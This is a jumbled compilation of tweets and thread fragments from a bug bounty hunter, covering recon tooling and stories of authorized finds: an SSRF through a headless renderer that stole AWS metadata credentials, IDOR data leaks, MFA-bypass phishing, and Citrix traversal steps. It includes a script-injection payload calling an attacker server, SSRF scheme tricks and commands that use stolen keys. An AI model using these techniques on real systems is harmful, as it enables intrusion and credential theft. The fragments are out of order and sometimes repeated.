In 2010, WikiLeaks released a classified document.
A list of infrastructure critical to U.S national security.
The government listed a Trans-Atlantic cable.
3 years ago,
19-year-old me gained ADMIN access to that cable (and another; shared codebase).
🧵Here's how I found it
I'm uncomfortable tweeting stuff like this out, but...
I found a critical vulnerability in
@opensea
this weekend and reported it through
@Hacker0x01
.
They fixed the issue within 3 hours of reporting and I just got this notification👏🫢
I hacked a large company (70k+ employees) through social engineering. Legally of course.
• I set up the infrastructure
• Scraped names & emails with LinkedIn
• Sent 200 phishing emails.
I had access to their AWS console within 2 minutes.
And much more:
I've spent the last 8 years hacking companies (legally).
Now, I'm starting a mattress company.
I'm taking on a $16B industry to solve a huge problem.
Here's why:
Apparently there was an internal network share that contained powershell scripts...
"One of the powershell scripts contained the username and password for a admin user in Thycotic (PAM) Using this i was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite"
Anyone can hack.
Yes, anyone.
You can hack. Big companies. With little to no technical skills. And make thousands of dollars. Legally.
It requires some common sense & a web browser.
Note: DON'T do this to websites unless you have permission! It's illegal.
Here's how:
I hacked the military.
A system containing the information of military personnel.
Yet, the hack was done legally.
Here's how I did it and how it was done legally:
@opensea
@Hacker0x01
I'm not trying to brag, I never share bounty amounts – but I'm literally shaking right now and wanted to share my amazement.
I'm super duper lucky and blessed to have found this 🙏
Who's your phone provider?
Well, there's a good chance that I've hacked them!
Last year, I breached a major telecom company (many times...)
This time, I stole the data of every employee.
(well, I didn't steal all of it, but I could've)...
Here's how I did it:
302 Military FTP servers.
Imagine you had access to 302 military FTP servers.
What data could possibly be on them?
Who would get hurt by that data?
Who would it benefit?
5 years ago,
A 17-year-old gained access to 300 military FTP servers.
Here's how I did it:
You can find easy critical vulnerabilities.
It just takes finding unique attack surfaces.
Here's an example of how you can, using a story of how I hacked a car company:
Lessons:
- Context is King. THINK!
- To break you must first understand: Know your target's technologies & the services they use.
- Learn to code.
Top:
Are you into web hacking?
If so, you must have technology-specific wordlists
If not, you're missing obvious vulnerabilities.
Don't believe me?
Let's look at an information disclosure in an ASP[.]NET Core site:
Authorization.
Easy to understand. Critical if implemented incorrectly.
Want to see an example? (dumb question Corben, yes, why not)
Last month, I found an auth bypass that lead to a full account takeover.
Here's how I found it:
See a host that's redirecting to Single-Sign on?
Don't skip it.
Do Content-Discovery.
Use gau.
Then ffuf.
You will be surprised at the misconfigurations you'll find.
And the things you can access (that you shouldn't be able to).
It's easy to find attack surfaces that others haven't.
You just need to think creatively.
"But Corben, I don't know how!"
That's what I'm here for.
I'll share some simple methodology that works.
(so you can find vulnerabilities...and make money)
A story:
TLDR;
- Participating in a bug bounty program (telecommunications company)
- Scanned their IPV4 Ranges
- Found a webserver that said "███ Cable System"
- Directory brute-force found /admin/accounts/
- The endpoint set a valid admin JSESSIONID.
In 2010, WikiLeaks released a classified document.
A list of infrastructure critical to U.S national security.
The government listed a Trans-Atlantic cable.
3 years ago,
19-year-old me gained ADMIN access to that cable (and another; shared codebase).
🧵Here's how I found it
What happens when you combine hackers and phones?
Phreaking?
Social Engineering?
Sure! Valid answers.
What you didn't think of is web vulnerabilities.
XXE.
I found an XXE by phone call in a bug bounty program.
Here's the story:
1/ The scope of this program was *.███.com
With a wildcard, basic recon is:
Subdomain Enumeration + HTTP server probing:
$ subfinder -d example[dot]com | httpx -o example.httpx
🚨 429 Too Many Requests.
You've been here before.
Getting rate-limited is THEE. WORST.
Thankfully, you can easily bypass it.
In most cases.
FireProx (by
@ustayready
) lets you use a different IP for every request (using AWS).
It's simple to use too:
6/ I eventually found 5 other similar issues that leaked:
• Customer names, phone numbers
• Payment details (cards, amounts, dates of payments)
• Etc.
I reported them all to their bug bounty program and they duplicated them into one report and eventually fixed the issues.
Attack surface is larger than you’d expect.
Most companies have domain names that they use internally (for development, QA, etc). Ex, PayPal uses “”
Heres how you can find network misconfigurations and find “internal assets” on the public internet:
I've made over 100k on SSRF vulnerabilities.
They aren't always as simple as pointing it at localhost or AWS Metadata service.
Here are some tricks I've picked up over the past 5 years of web app testing:
Directory-brute forcing?
You should NEVER filter based on status code.
Paths can exist and return a 404.
I’ve seen this so many times:
/noexist/ -> 404 Not Found.
/api/ -> 404 Not Found, but different response body (JSON formatted)
/api/endpoint -> 200 OK
Filter by
Most companies have domain names that they use internally (for development, QA, etc). For example, PayPal uses "". I've seen so many network misconfigurations and you can find these juicy internal hosts on the public internet. 1/🧵
✋Traditional file & directory brute-forcing can only get you so far.
👉 Here’s an easy way to generate target-based wordlists with gau and
@tomnomnom
’s unfurl:
You're using Burp Collaborator wrong.
Don't use Burp's default collaborator instance when testing for out of band vulnerabilities.
Many companies use egress filtering & block outbound traffic to the default collaborator domain
It's worth setting up a
I just rewrote and now released subjs v1.0.0 (). Javascript files can contain an abundance of valuable information when hacking – from undocumented API endpoints to secrets – if you aren't digging through them, you need to!
#bugbountytips
1/ I used Evilnginx2 to bypass MFA (Okta & Duo)
From Okta, I could access Outlook, Sharepoint, Github, & many more services on behalf of the 50+ employees that fell for the phish.
I was blown away by how easy it was to pull off this "hack" that could've impacted 60M+ people.
You're probably directory brute-forcing wrong.
You should be methodical when targeting frameworks such as Express, Rails, Flask, Django, etc.
2/ By default, ffuf uses the GET HTTP method.
You should be fuzzing with different HTTP methods.
Try using a wordlist multiple times
3/ After spidering the site with Burp, I eventually came across an old Javascript file.
This javascript contained a reference to a JSP file with a name that indicated similar functionality:
"/myaccount/modals/view_call_log_details_modal.jsp"
1/ I've been in this bug bounty program for quite some time.
I previously bought a phone plan so I could login and test functionality as an authenticated user.
In the dashboard, there was a tab to view your call logs.
The DoD experienced its largest leak in 10 years.
Jack Teixeira shared highly classified military documents on Discord.
He was arrested.
3 years ago, a 20-year-old kid found a vulnerability that leaked confidential aircraft & missile information.
Here's how I did it:
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
Quick script that I use religiously for content discovery.
Oof.
The gal sitting next to me on the plane works for a pretty big company.
She’s got a spreadsheet open on her computer…
And it’s got passwords lol
Company2021@
2/ The URL contained a parameter called "subscriberId".
It contained a numerical ID, so obviously I tried to change it to another users.
Unfortunately, it didn't work.
Understanding how systems work is a competitive advantage as a hacker.
How do you get to this point?
Build.
Code a complex, modern application that relies on:
-> a database
-> caching/memory-store (redis)
-> message broker (rabbitmq)
etc.
Deploy it.
#typefully
1. Try other URL schemes:
• file:// (file read)
• netdoc:// (file read)
• dict://
• gopher://
• jar://
• ldap://
• and more!
You might be able to get file read.
Or send multi-line requests to gain additional impact
(Ex: gopher + redis = likely RCE)
4/ So, I visited the endpoint:
The page loaded, and in the response I saw my call logs:
Hm. What happens if I try to change the subscriberId to someone else's here?
Super excited to announce that I've joined
@assetnote
as a software engineer! Stoked to work with great people like
@infosec_au
and on an amazing product 🎉
2/ I searched the company's name on bgp.he\.net
Saved their IP ranges.
I ran
@ErrataRob
's masscan, probed for HTTP(s) servers, and grabbed the HTTP titles.
Looked something like:
$ masscan -p 80,443 -iL ranges -oL out.txt
$ cat out.txt | httpx -title
One title stuck out:
1. I started with reconnaisance:
- Subdomain enumeration to find the company's subdomains.
- HTTP server probing to see what's online
$ subfinder -d example[dot]com | httpx -o target.httpx
I came across a webserver running IIS:
hxxps://installersupport.██████.com/
A CVE-2019-19781 is this easy –
1. Traversal to vpns folder, traversal in the NSC_HEADER + to write a malicious bookmark to the /netscaler/portal/templates/ folder (1st HTTP request),
2. Passing that template through the Template Toolkit (2nd request)
I've re-written gau! This includes speed improvements, a new provider (urlscan), loading options from configuration files, new filter support, socks5 proxy support, and more!
Make sure to grab the new version!
8/ Redirected to the home page.
Second visit:
> HTTP/1.1 200 OK
> --- snip ---
> <title>Account Administration</title>
HOLY **** IT WORKED.
This is a HIGHLY redacted version of what I saw:
So,
Internal assets = sensitive.
Apps meant for internal usage usually have weaker security than those facing the external.
Sometimes, internal assets aren't so internal.
Here's how you can find such misconfigurations:
1/ It began with a bug bounty program.
Of a telecommunications company (that I can't name publicly).
As some of you may know, I love recon.
I had already done subdomain enumeration.
The next step was to scan their IP ranges.
So,
14/ I verified they worked:
$ export AWS_ACCESS_KEY_ID=
$ export AWS_SECRET_ACCESS_KEY=
$ export AWS_SESSION_TOKEN=
$ aws sts get-caller-identity
The keys worked.
And Scout2 proved I had access to too much :)
4/ Look at the code in this picture.
Routes are defined explicitly. In this example:
You must GET /one to get a response.
You must POST /two to get a valid response.
Brute-force with API routes and dictionary words.
(PS:
@assetnote
wrote about Contextual Content Discovery)
Someone hacked an Uber employees HackerOne account and is commenting on all of the tickets. They likely have access to all of the Uber HackerOne reports.
9/ I clicked through the menus to see if I was actually authenticated.
I was. FULLY. AUTHENTICATED.
On that same IP range,
They had ANOTHER system for ANOTHER cable.
I tried the same attack.
IT WORKED!
I had admin access to TWO. Different. Cables.
I was in disbelief.
So,
2/ HTTPX gave me 300 web-servers to target.
One stuck out to me:
hxxps://rendering-prd.redacted[.]com
"rendering" stuck out to me. Why?
Render means to "process information". Often to another format.
With web apps, it's typically HTML to another format.
Note: this is all alleged. I found the Telegram in this email that the hacker sent out via an Uber employees HackerOne account (via policy update). I’ve obviously got nothing to do it and have not reproduced or confirmed any of this.
Update: A Threat Actor claims to have completely compromised Uber - they have posted screenshots of their AWS instance, HackerOne administration panel, and more.
They are openly taunting and mocking
@Uber
.
1/
Become a dev (to break you must understand):
• Read "Mastering Ethereum" (It's on GitHub)
• Learn Solidity:
• CryptoZombies
• solidity-by-example[.]org
• Solidity Docs
• Learn how to use HardHat
• Familiarize yourself with widely used contracts (EIP 20)
Announcing the public release of my tool secretz! Written during our research of TravisCI, secretz is a tool that minimizes the large attack surface of Travis CI. It automatically fetches repos, builds, and logs for any given organization. Check it out:
5/ The directory /admin/
Remember, it's running Apache Tomcat.
I built a wordlist for .jsp files using BigQuery. (Learned from
@assetnote
's commonspeak)
Bruteforcing found a few JSP files, but they all redirected to the login page.
Gah. Well,
Companies run software they don't write.
Ex: Jira, GoAnywhere, etc.
Finding vulns in these types of software = lots of vuln targets = $$$
So, do code review!
Need the source? Find the software AWS's AMI Catalog.
Launch a server. SSH in. Pull it. Review it
#typefully
day 4
5/ You also must brute-force with different HTTP methods.
I love
@joohoi
's FFUF for directory/endpoint brute-forcing.
By default, ffuf uses the GET method.
So, I started with that and filtered by the number of response words (6) on the 404 page:
2/ Learn networking.
@three_cube
has some amazing FREE resources on his website.
Google "Network Basics for Hackers" and go through all of the posts.
Here, learn TCP/IP basics, Subnetting, Network Masks, DNS, HTTP, etc.
BORING? Maybe. But this knowledge is invaluable.
2/ Phishing attacks are on the rise and are becoming more sophisticated.
Last year we saw Uber, Dropbox, Twilio, Axie Infinity ($625M theft), and more compromised through phishing.
People argue that humans are the "weakest link", yet, companies of all sizes still rely on:
10/ Success.
I got a request to /test.js with the User-Agent: Chrome/75.x.xx
Running "whois" on the requesting IP address showed it was from AWS.
AWS has a meta-data server at 169.254.169.254.
It can be used to generate temporary access keys.
To an AWS environment.
12. I wanted to verify that this data was fresh.
So, In the mobile app, I created another account.
I targeted the new account and it worked!!
I reported it to the company's bug bounty program on
@Hacker0x01
They fixed it and I was eventually rewarded for it!
4/ "login.jsp"
Ok! It was a Tomcat webserver
I didn't have credentials. Obviously.
I started with directory brute-forcing.
Used
@joohoi
's ffuf & filtered by the number of response words on the 404 page.
It found several directories.
One that stuck out was
Information is key.
What sort of information could be in an Airforce Database?
Who would get hurt by that data?
Who would it benefit?
5 years ago, 17-year-old me easily gained access to an Air Force database.
Legally, through
Here's how I did it:
3/ Forcing the consumption of cartoon training videos twice a year & hoping their SEG works.
While some organizations are moving towards FIDO2, many aren't & can't.
Companies aren't effectively equipping their employees to recognize & avoid the latest real-world threats.
Do you have any "Oh Sh*t" moments?
Here's one of mine from a year or two ago.
The time I took down an API. A production API.
Of an advertising company...On a Saturday...(and it stayed down for hours...)
Here's what happened:
12/ Headless browsers don't care.
So, I tried this javascript
POST /render HTTP.1,1
markup=<script src="hxxps://myserver/pwn.js"></script>
The server responded: 200 OK
Checked Burp Collaborator and it worked! My server had a request to "/main-production-worker-iam-role"
So
Finding vulnerabilities first = you get paid.
Want to be the first to hack on new functionality? Monitor your target’s JS files for new paths or parameters.
(automate with a headless browser to grab all dynamically loaded JS)
#typefully
day 9